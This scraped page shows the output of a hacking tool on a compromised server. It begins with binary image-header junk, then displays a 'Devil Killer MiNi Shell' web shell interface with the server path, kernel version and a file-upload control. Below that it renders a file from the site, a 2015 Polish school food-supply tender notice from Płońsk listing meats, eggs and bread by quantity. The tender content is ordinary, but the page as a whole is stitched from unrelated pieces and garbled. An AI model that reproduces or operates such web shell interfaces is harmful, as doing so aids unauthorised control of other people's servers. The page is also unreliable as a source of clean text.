JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151207/179495-N-2015.html

<p class="kh_header"><b>Płońsk: Dostawa artykułów żywnościowych na potrzeby Zespołu Szkół Nr 1 w Płońsku na rok 2016</b><br>
<b>Numer ogłoszenia: 179495 - 2015; data zamieszczenia: 07.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Nr 1 im. St. Staszica w Płońsku , ul. Sienkiewicza 8, 09-100 Płońsk, woj. mazowieckie, tel. 023 6622987, faks 023 6622987.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zs1plonsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Jednostki Samorządu Terytorialnego..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych na potrzeby Zespołu Szkół Nr 1 w Płońsku na rok 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są sukcesywne dostawy artykułów żywnościowych na potrzeby Zespół Szkół Nr 1 w Płońsku  na rok 2016. 
Zamówienie zostało podzielone na  dziesięć części (I-X):
CZĘŚĆ  I - mięso i przetwory
CZĘŚĆ   II -   jaja 
CZĘŚĆ  III -  pieczywo
CZĘŚĆ  IV -  ciasta
CZĘŚĆ   V -  jabłka
CZĘŚĆ VI- pozostałe owoce i warzywa 
CZĘŚĆ VII-produkty mleczarskie
CZĘŚĆ VIII -mrożone warzywa, owoce i potrawy
CZĘŚĆ IX-różne artykuły żywnościowe
CZĘŚĆ X-ziemniaki
Zamawiający dopuszcza składanie ofert częściowych. Każdy Wykonawca może złożyć tylko jedną ofertę. Oferta może obejmować jedną wybraną część, dowolną ilość części lub wszystkie dziesięć części. Zamawiający nie dopuszcza podziału zamówienia w ramach części.

2.	Szczegółowy wykaz artykułów żywnościowych stanowiących przedmiot zamówienia oraz wymagania dotyczące realizacji dostaw przedstawione zostały w Opisie przedmiotu zamówienia -Załącznik Nr 1 do SIWZ
3.	Zamawiający wymaga by artykuły żywnościowe będące przedmiotem zamówienia były towarem pełnowartościowym, spełniły wymagania jakościowe, wszelkie normy obowiązujące dla tego typu artykułów.
4.	Zamawiający wymaga by artykuły żywnościowe były artykułami pierwszego gatunku i z ważnym terminem przydatności do spożycia.
5.	Zamawiający wymaga by artykuły spożywcze były odpowiednio opakowane, a opakowania posiadały następujące informacje: nazwa artykułu, skład, waga, nazwa producenta, data przydatności do spożycia pod rygorem zwrotu towaru. Opakowania były trwałe i nienaruszone.
6.	Podane ilości towaru są wielkościami szacunkowymi, służą wyłącznie do obliczenia ceny oferty. Zamawiający nie będzie zobowiązany do zakupu pełnego asortymentu w podanych ilościach.
7.	Zamawiający może dowolnie zmniejszyć ilość artykułów spożywczych stanowiących przedmiot zamówienia, poniżej ilości określonych szacunkowo w Opisie przedmiotu zamówienia w zależności od potrzeb Zamawiającego. Wykonawcy z tego tytułu nie przysługują żądne roszczenia finansowe lub prawne.
8.	Zamawiający może zwiększyć ilość zamówionych artykułów powyżej ilości określonych szacunkowo w Opisie przedmiotu zamówienia , w zależności od potrzeb własnych Zamawiającego do limitu posiadanych środków finansowych.
9.	Zamawiający zastrzega sobie prawo do zakupu innych artykułów spożywczych nie wymienionych w Opisie przedmiotu zamówienia po cenach wynikających z ogólnie dostępnego cennika Wykonawcy na dzień złożenia zamówienia przez Zamawiającego  do limitu posiadanych środków finansowych.
10.	Artykuły żywnościowe stanowiące przedmiot zamówienia muszą spełniać wymagania określone w ustawie z dnia 25  sierpnia 2006r. O bezpieczeństwie żywności i żywienia  (Dz. U. z 2015, poz.594-j.t).
11.	Wykonawca będzie zobowiązany do dostarczania zamawianych artykułów do siedziby Zamawiającego  na własny koszt i ryzyko oraz do rozładunku towaru i złożenia go w miejscu wskazanym przez Zamawiającego.
12.	Wykonawca zobowiązany jest zapewnić transport artykułów spożywczych zgodnie z obowiązującymi przepisami i zasadami higieny.
13.	Wykonawca zobowiązany jest zabezpieczyć należycie towar na czas jego transportu (opakowania, pojemniki przystosowane do przewozu danego asortymentu) i ponosi całkowitą odpowiedzialność za dostawę i jakość dostarczonego towaru.
14.	Zamówienia na dostawy bieżące, zgodne z potrzebami Zamawiającego będą składane z  jednodniowym wyprzedzeniem, telefonicznie, faksem lub w czasie dostawy na dostawę następną. Wykonawca musi wykazywać dyspozycyjność we wszystkie dni robocze od poniedziałku do piątku, a w uzasadnionych przypadkach na żądanie również w soboty.
15.	Zamawiający zastrzega sobie możliwość zawieszenia dostaw artykułów żywnościowych w okresie letnich wakacji szkolnych i inne wybrane  dni wolne od nauki szkolnej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 03.14.25.00-3, 15.81.00.00-9, 15.81.20.00-3, 03.22.23.21-9, 03.20.00.00-3, 15.15.30.00-1, 15.30.00.00-1, 15.20.00.00-0, 15.50.00.00-3, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.89.60.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art.22 ust 1 ustawy Pzp.
Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia -nie spełnia na podstawie badania złożonego  oświadczenia tj. złożone prawidłowo oświadczenie żądane przez Zamawiającego spełnia warunek, nie złożone z zastrzeżeniem art. 26 ust. 3 ustawy Pzp nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art.22 ust 1 ustawy Pzp.
Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia -nie spełnia na podstawie badania złożonego  oświadczenia tj. złożone prawidłowo oświadczenie żądane przez Zamawiającego spełnia warunek, nie złożone z zastrzeżeniem art. 26 ust. 3 ustawy Pzp nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art.22 ust 1 ustawy Pzp.
Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia -nie spełnia na podstawie badania złożonego  oświadczenia tj. złożone prawidłowo oświadczenie żądane przez Zamawiającego spełnia warunek, nie złożone z zastrzeżeniem art. 26 ust. 3 ustawy Pzp nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art.22 ust 1 ustawy Pzp.
Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia -nie spełnia na podstawie badania złożonego  oświadczenia tj. złożone prawidłowo oświadczenie żądane przez Zamawiającego spełnia warunek, nie złożone z zastrzeżeniem art. 26 ust. 3 ustawy Pzp nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art.22 ust 1 ustawy Pzp.
Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia -nie spełnia na podstawie badania złożonego  oświadczenia tj. złożone prawidłowo oświadczenie żądane przez Zamawiającego spełnia warunek, nie złożone z zastrzeżeniem art. 26 ust. 3 ustawy Pzp nie spełnia warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	wypełniony Formularz oferty cenowej wraz ze Szczegółowym formularzem cenowy odpowiednio dla części I-X (  wg wzoru - Załącznik Nr  2 do SIWZ),
b)	niezbędne pełnomocnictwa, jeżeli zostały udzielone, 
c)	zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia - jeżeli dotyczy (według wzoru - Załącznik Nr 6 SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w sytuacji niemożliwej do przewidzenia w chwili zawarcia umowy, na uzasadniony wniosek w następujących przypadkach: 
1)	zmiany danych podmiotowych (np. w wyniku przekształcenia), 
2)	możliwa jest zmiana umowy, która w sposób obiektywny jest korzystna dla Zamawiającego, a na dokonanie tej zmiany wyraża zgodę Wykonawca,
2.	dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia publicznego. 
3.	Zmiany ilości zamawianych artykułów żywnościowych nie wymagają aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zs1plonsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 1 w Płońsku, ul. H. Sienkiewicza 8, 09-100 Płońsk - na pisemny wniosek Wykonawcy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2015 godzina 12:00, miejsce: Zespół Szkół Nr 1 , ul. H. Sienkiewicza 8, 09-100 Płońsk - sekretariat szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wszystkie produkty muszą spełniać warunki zawarte w rozporządzeniu ministra zdrowia z dnia 26.08.2015 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach.

1.	Przewidywana częstotliwość dostaw :  codziennie  - nie później niż do godz. 8.00 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.  
3.	Szczegóły dotyczące ilości i asortymentu dostaw dziennych, ustalane będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty należy dostarczać w pojemnikach z materiałów dopuszczonych do kontaktu z żywnością, zamkniętych i oplombowanych w sposób uniemożliwiający ich otwarcie bez uszkodzenia plomb. Każdy asortyment produktów winien być dostarczony w oddzielnym pojemniku.
5.	Okres przydatności do spożycia dla mięsa winien wynosić nie mniej niż 5 dni od daty dostawy do magazynu Zamawiającego.  
6.	Okres przydatności do spożycia wędlin winien wynosić w dniu dostawy do magazynu zamawiającego nie mniej niż  9/10  gwarancji określonej przez producenta.
7.	Do każdego pojemnika powinna być dołączona etykieta zawierająca co najmniej następujące dane:
-  nazwę produktu,
-  termin przydatności do spożycia,
-  nazwę dostawcy - producenta, adres,
-  warunki przechowywania,
-	oznaczenie partii produkcyjnej,
-	oraz pozostałe informacje zgodne z aktualnie obowiązującymi przepisami



LP	Opis przedmiotu zamówienia	
ilość
1	Boczek surowy wieprzowy	30 kg
2	Kurczak cały surowy	120kg
3	Karkówka b/k wieprzowa	200kg
4	Łopatka b/k wieprzowa	600kg
5	Szynka gotowana	250kg
6	Filet królewski	50kg
7	Szynka wieprzowa b/k	290 kg
8	Żeberka wieprzowe	50kg
9	Filet drobiowy(mięso świeże nie mrożone, wyselekcjonowane z piersi kurczaka)	300kg 
10	Porcja rosołowa (mięso świeże nie mrożone, korpus kurczaka pozostały po wytrybowaniu mięsa)	500kg
11	Udka z kurczaka (udko, podudzie ) mięso świeże nie mrożone	700kg
12	Baleron	50 kg
13	Szynka wiejska	50kg
14	Kiełbasa cienka  bez konserwantów, produkt z mięsa wieprzowego i wołowego w osłonkach parzony i wędzony bez dodatków białkowych, utleniaczy i środków chemicznych 	50 kg
15	Pieczeń myśliwska 	60 kg
16	Kiełbasa krakowska	70kg
17	Pieczeń wieprzowa	60kg
18	Ogonówka produkt wieprzowy wędzony parzony biodrówka b/k 75%	80kg
19	Łopatka wędzona	50kg
20	Parówki z szynki 90% mięsa bez konserwantów, bez dodatków białkowych, utleniaczy i środków chemicznych	40kg
21	Polędwica drobiowa 	50 kg
22	Polędwiczki wieprzowe odtłuszczone	150kg
23	Kiełbasa szynkowa tradycyjna parzona 	50 kg
24	Wołowina bez kości wyselekcjonowane z części udźca bez ścięgien i tkanki tłuszczowej	120kg
25	Kabanosy 	60 kg
26	Smalec w kostce (200g)	10szt
27	Kiełbas krakowska podsuszana	50 kg
28	Schab środkowy bez kości	600kg
29	Kiełbasa żywiecka	50 kg
30	Pasztet wieprzowy	50kg
31	Polędwica sopocka	70 kg
32	Schab pieczony 	60kg
33	Filet z indyka (mięso świeże nie mrożone, wyselekcjonowane z piersi indyka)	150 kg
35	Szynka wędzona 	300 kg
35	Indyk faszerowany	60 kg
36	Kiełbas cienka podwawelska 	50kg
37	Cielęcina mięso bez kości	20kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wszystkie produkty muszą spełniać warunki zawarte w rozporządzeniu ministra zdrowia z dnia 26.08.2015 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach


1.	Przewidywana częstotliwość dostaw raz w tygodniu.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły, dotyczące ilości dostaw jednostkowych, ustalane będą na podstawie jadłospisów tygodniowych, tworzonych na bieżąco, według potrzeb Zamawiającego.
4.	Termin przydatności do spożycia nie krótszy niż 25 dni.



Opis przedmiotu zamówienia	
ilość

Jaja świeże - klasa L - 63g	8000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wszystkie produkty muszą spełniać warunki zawarte w rozporządzeniu ministra zdrowia z dnia 26.08.2015 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach


1.	Przewidywana częstotliwość dostaw: codziennie:  poniedziałek - piątek,  nie później niż do godz. 6.30 rano. 
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły  dotyczące ilości i asortymentu dostaw dziennych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.



LP	Opis przedmiotu zamówienia	
ilość
1	Chleb żytni 300g ( mąka żytnia, zakwas żytni, sól woda)	100
2	Chleb pszenny krojony 500g	500
3	Chleb razowy krojony 500g	300
4	Chleb graham 400g	100
5	Chleb orkiszowy 400g	100
6	Chleb pełnoziarnisty 400g	300
7	Bułka tarta kg	200
8	Bułka zwykła 90g	500
9	Bułka kajzerka 80g	500
10	Bułka żytnia 80g	2000
11	Bułka graham 80g	8000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ciasta.</p>
